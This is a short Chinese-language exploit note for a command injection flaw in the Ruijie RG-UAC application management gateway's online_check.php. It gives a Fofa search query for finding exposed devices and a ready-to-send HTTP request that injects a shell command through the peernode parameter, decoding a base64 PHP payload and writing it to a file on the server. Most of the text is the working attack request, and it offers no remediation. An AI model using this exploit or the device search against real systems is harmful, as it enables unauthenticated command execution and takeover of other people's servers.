简介
锐捷RG-UAC系列应用管理网关是锐捷自主研发的应用管理产品。
漏洞简介
锐捷RG-UAC应用管理网关 online_check.php存在命令注入漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。
影响版本
锐捷RG-UAC应用管理网关
Fofa:
app="Ruijie-RG-UAC"
漏洞复现
GET /view/vpn/autovpn/online_check.php?peernode=%20|%20`echo%20PD9waHAgcGhwaW5mbygpOw==%20|%20base64%20-d%20%3E%20test.php` HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d52cad02fa7c229ec2e0f5b2081451f6